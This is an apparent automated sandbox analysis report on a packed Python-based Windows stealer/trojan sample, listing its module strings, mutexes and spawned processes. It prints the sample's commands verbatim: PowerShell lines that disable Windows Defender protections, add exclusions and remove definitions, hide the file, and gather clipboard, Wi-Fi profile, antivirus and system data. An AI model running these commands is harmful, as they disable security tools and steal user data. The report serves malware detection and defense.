              Source: KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000000.1669173285.000000000043F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.1672821995.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000002.2910567037.000000000043B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048117788.00000000050F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2902511087.000000006F875000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2900967106.000000006F81F000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2904354271.000000006F8E6000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2882901665.000000000043B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2900318548.000000006F80B000.00000004.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000003.2056060266.0000000000190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000000.2052256038.000000000043F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2896645946.000000006BE78000.00000004.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898540098.000000006C2B4000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2905154634.000000006F90E000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2897045196.000000006BF0F000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilenamelibsslH vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2901575971.000000006F847000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2902814249.000000006F89A000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2903320581.000000006F8B7000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2902098945.000000006F85B000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2899938912.000000006C7BD000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2905634194.000000006F922000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2897932299.000000006C159000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exeBinary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: KpHYfxnJs6.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: Commandline size = 3647
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 3615
              Source: KpHYfxnJs6.exeStatic PE information: Section: ZLIB complexity 0.9997178819444444
              Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9979877861815208
              Source: libssl-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9909470942982456
              Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992167078976848
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9968581058808017
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9947857908393501
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@206/55@4/2
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA3CAFC GetLastError,FormatMessageW,109_2_00007FF6FAA3CAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA3EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,109_2_00007FF6FAA3EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA6B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,109_2_00007FF6FAA6B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA43144 GetDiskFreeSpaceExW,109_2_00007FF6FAA43144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3548:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeMutant created: \Sessions\1\BaseNamedObjects\i
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2288:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1464:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:560:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202Jump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: KpHYfxnJs6.exe, 00000004.00000003.2743545312.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: KpHYfxnJs6.exeVirustotal: Detection: 43%
              Source: KpHYfxnJs6.exeReversingLabs: Detection: 42%
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile read: C:\Users\user\Desktop\KpHYfxnJs6.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\KpHYfxnJs6.exe "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Users\user\Desktop\KpHYfxnJs6.exe "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
